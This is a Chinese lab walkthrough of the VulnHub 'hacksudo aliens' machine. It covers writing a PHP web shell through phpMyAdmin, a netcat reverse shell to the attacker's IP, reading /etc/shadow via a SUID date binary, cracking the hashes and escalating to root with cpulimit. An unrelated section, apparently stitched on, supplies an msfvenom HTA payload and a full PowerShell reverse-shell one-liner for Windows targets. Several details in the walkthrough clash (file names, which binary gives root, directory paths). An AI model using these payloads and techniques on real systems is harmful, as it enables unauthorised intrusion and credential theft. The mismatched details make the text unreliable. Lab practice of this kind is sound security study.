靶机练习 aliens phpmyadmin拿shell date命令提权

在这里插入图片描述

靶机信息

下载地址:

https://www.vulnhub.com/entry/hacksudo-aliens,676/

名称: hacksudo系列ALIENS

靶场: VulnHub.com

难度: 简单

发布时间: 2021年4月4日

提示信息: 无

目标: user.txt和root.txt

实验环境

攻击机:VMware  kali    192.168.7.3
靶机:Vbox     linux   IP自动获取

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 192.168.7.1/24

image-20220125195123164

扫描到靶机地址为192.168.7.122

端口扫描

端口扫描是扫描目标机器所开放的服务

sudo nmap -sC -sV -p- 192.168.7.122 -oN aliens.nmap

image-20220125195303179

扫描到3个开放的端口22(SSH),80(HTTP)和9000(HTTP),先从80开始入手

Web渗透

访问80

http://192.168.7.122

image-20220125195810451

是一个目击外星人数据的网站,未发现敏感信息,做个目录扫描

目录扫描

dirsearch -u http://192.168.7.122 -e php,html,txt,zip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20220125201334857

扫描到2个目录,看看backup这个目录下面有什么

image-20220125201410630

发现一个mysql备份文件,下载下来看看

wget http://192.168.7.122/backup/mysql.bak
cat mysql.bak

image-20220125201651616

发现数据库帐号和密码

user=vishal
password=hacksudo

没有其他可利用的信息了,再来看看9000端口

http://192.168.7.122:9000

image-20220125201946748

原来是phpMyAdmin(mysql数据库管理工具),用刚才获取到的帐号密码登录试试

image-20220125205224234

phpMyAdmin写入shell

登录成功,试试有没有写权限,我们直接写个反弹shell的脚本

select "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.7.3 4444 >/tmp/f');?>" into outfile "/var/www/html/s.php"

image-20220125211705749

image-20220125211740745

写入成功,验证一下

反弹shell

kali攻击机监听4444端口

nc -lvvp 4444

image-20220125210930130

web上执行payload

http://192.168.7.122/shell.php

image-20220125212003404

反弹成功,切换完整的交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xter
Ctrl+z

image-20220125212208975

stty -a

image-20220125212243981

stty raw -echo;fg
reset

image-20220125212401165

stty rows 20 columns 82

image-20220125212434023

切换完成,干正事,查找一切可利用的敏感信息

/var/backups目录下发现4个root权限的备份文件,但是没有权限查看,继续找

image-20220125212818268

find / -perm -u=s -type f 2>/dev/null

image-20220125213514314

发现个/usr/bin/date有s权限,我们可以利用这个命令读取文件

/usr/bin/date -f /etc/shadow

image-20220125214933106

发现两个帐号有密码,把他们保存到kali攻击机上

vi passwd.txt

image-20220125215139486

还需要处理一下格式,将前面多余的内容,和最后的单引号去掉

image-20220125215452802

处理好了,现在开始暴破密码

john passwd.txt

image-20220125220732668

拿到hacksudo帐号的密码aliens,登录ssh

ssh hacksudo@192.168.7.122

image-20220125221253218

登录成功,找找可利用的敏感信息

/home/hacksudo/Desktop目录下找到user.txt

cd /home/hacksudo/Desktop
ls
cat user.txt

image-20220125222108281

cpulimit提权

/home/hacksudo/Desktop目录下发现cpulimit文件有s权限

cd /home/hacksudo/Download
ls -al

image-20220125222259726

这个程序是可以提权的

./cpulimit -l 100 -f -- /bin/sh -p

image-20220125222921945

提权成功,查看最后一个flag

cd /root
ls -al
cat root.txt

image-20220125223116818

OK,拿到root.txt,游戏结束
在这里插入图片描述
在这里插入图片描述

### Windows 靶机反弹 Shell方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值